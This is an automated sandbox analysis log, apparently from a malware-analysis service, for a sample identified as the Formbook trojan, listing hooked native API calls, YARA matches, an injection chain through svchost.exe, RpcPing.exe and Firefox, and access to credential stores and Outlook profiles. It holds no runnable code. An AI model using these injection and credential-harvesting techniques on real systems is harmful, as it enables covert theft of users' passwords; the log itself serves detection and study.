            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AF0 NtWriteFile,2_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472AB0 NtWaitForSingleObject,2_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F60 NtCreateProcessEx,2_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F30 NtCreateSection,2_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FE0 NtCreateFile,2_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472F90 NtProtectVirtualMemory,2_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FA0 NtQuerySection,2_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472FB0 NtResumeThread,2_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E30 NtWriteVirtualMemory,2_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EE0 NtQueueApcThread,2_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472E80 NtReadVirtualMemory,2_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472EA0 NtAdjustPrivilegesToken,2_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D00 NtSetInformationFile,2_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D10 NtMapViewOfSection,2_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472D30 NtUnmapViewOfSection,2_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DD0 NtDelayExecution,2_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472DB0 NtEnumerateKey,2_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C60 NtCreateKey,2_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472C00 NtQueryInformationProcess,2_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CC0 NtQueryVirtualMemory,2_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CF0 NtOpenProcess,2_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472CA0 NtQueryInformationToken,2_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473010 NtOpenDirectoryObject,2_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473090 NtSetValueKey,2_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034739B0 NtGetContextThread,2_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D70 NtOpenThread,2_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03473D10 NtOpenProcessToken,2_2_03473D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA4340 NtSetContextThread,LdrInitializeThunk,5_2_02CA4340
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA4650 NtSuspendThread,LdrInitializeThunk,5_2_02CA4650
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2AD0 NtReadFile,LdrInitializeThunk,5_2_02CA2AD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2AF0 NtWriteFile,LdrInitializeThunk,5_2_02CA2AF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02CA2BE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02CA2BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02CA2BA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2B60 NtClose,LdrInitializeThunk,5_2_02CA2B60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02CA2EE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02CA2E80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2FE0 NtCreateFile,LdrInitializeThunk,5_2_02CA2FE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2FB0 NtResumeThread,LdrInitializeThunk,5_2_02CA2FB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2F30 NtCreateSection,LdrInitializeThunk,5_2_02CA2F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02CA2CA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2C60 NtCreateKey,LdrInitializeThunk,5_2_02CA2C60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02CA2C70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02CA2DD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02CA2DF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02CA2D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02CA2D30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA35C0 NtCreateMutant,LdrInitializeThunk,5_2_02CA35C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA39B0 NtGetContextThread,LdrInitializeThunk,5_2_02CA39B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2AB0 NtWaitForSingleObject,5_2_02CA2AB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2B80 NtQueryInformationFile,5_2_02CA2B80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2EA0 NtAdjustPrivilegesToken,5_2_02CA2EA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2E30 NtWriteVirtualMemory,5_2_02CA2E30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2F90 NtProtectVirtualMemory,5_2_02CA2F90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2FA0 NtQuerySection,5_2_02CA2FA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2F60 NtCreateProcessEx,5_2_02CA2F60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2CC0 NtQueryVirtualMemory,5_2_02CA2CC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2CF0 NtOpenProcess,5_2_02CA2CF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2C00 NtQueryInformationProcess,5_2_02CA2C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2DB0 NtEnumerateKey,5_2_02CA2DB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2D00 NtSetInformationFile,5_2_02CA2D00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA3090 NtSetValueKey,5_2_02CA3090
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA3010 NtOpenDirectoryObject,5_2_02CA3010
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA3D70 NtOpenThread,5_2_02CA3D70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA3D10 NtOpenProcessToken,5_2_02CA3D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00498FD0 NtCreateFile,5_2_00498FD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00499140 NtReadFile,5_2_00499140
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00499230 NtDeleteFile,5_2_00499230
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004992D0 NtClose,5_2_004992D0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00499430 NtAllocateVirtualMemory,5_2_00499430
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 101 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 02CB7E54 appears 110 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 02CDEA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 02C5B970 appears 280 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 02CEF290 appears 105 times
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: String function: 02CA5130 appears 58 times
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: String function: 00445AE0 appears 65 times
            Source: N2Qncau2rN.exe, 00000000.00000003.1659170774.00000000047BD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs N2Qncau2rN.exe
            Source: N2Qncau2rN.exe, 00000000.00000003.1658523264.0000000004613000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs N2Qncau2rN.exe
            Source: N2Qncau2rN.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/10
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW | 0_2_0044AF6C
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState | 0_2_004333BE
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle | 0_2_00464EAE
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode | 0_2_0045D619
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle | 0_2_004755C4
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize | 0_2_0047839D
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx | 0_2_0043305F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | File created: C:\Users\user\AppData\Local\Temp\Keily
            Source: N2Qncau2rN.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: RpcPing.exe, 00000005.00000002.4127083272.0000000002842000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.2079097179.0000000002876000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.2079097179.0000000002821000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.2079097179.0000000002842000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.0000000002876000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: N2Qncau2rN.exe | ReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeFile read: C:\Users\user\Desktop\N2Qncau2rN.exeJump to behavior
            Source: unknown Process created: C:\Users\user\Desktop\N2Qncau2rN.exe "C:\Users\user\Desktop\N2Qncau2rN.exe"
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\N2Qncau2rN.exe"
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: credui.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\N2Qncau2rN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: N2Qncau2rN.exe Static file information: File size 1401699 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: auuGcaPMTDojV.exe, 00000003.00000000.1802625939.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4125799190.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: N2Qncau2rN.exe, 00000000.00000003.1657483680.0000000004690000.00000004.00001000.00020000.00000000.sdmp, N2Qncau2rN.exe, 00000000.00000003.1659461075.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1785147049.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787099857.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.000000000359E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1889918613.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1885758983.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002C30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.1850301385.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850352705.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000003.2198579685.00000000007DB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: N2Qncau2rN.exe, 00000000.00000003.1657483680.0000000004690000.00000004.00001000.00020000.00000000.sdmp, N2Qncau2rN.exe, 00000000.00000003.1659461075.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1888606997.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1785147049.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1787099857.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1888606997.000000000359E000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000005.00000002.4129055443.0000000002DCE000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1889918613.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000003.1885758983.00000000028BC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4129055443.0000000002C30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.1850301385.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850352705.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000003.00000003.2198579685.00000000007DB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000005.00000002.4129603004.000000000325C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185961069.000000000D58C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000005.00000002.4129603004.000000000325C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000005.00000002.4127083272.00000000027C2000.00000004.00000020.00020000.00000000.sdmp, auuGcaPMTDojV.exe, 00000008.00000002.4128831600.0000000002B5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185961069.000000000D58C000.00000004.80000000.00040000.00000000.sdmp
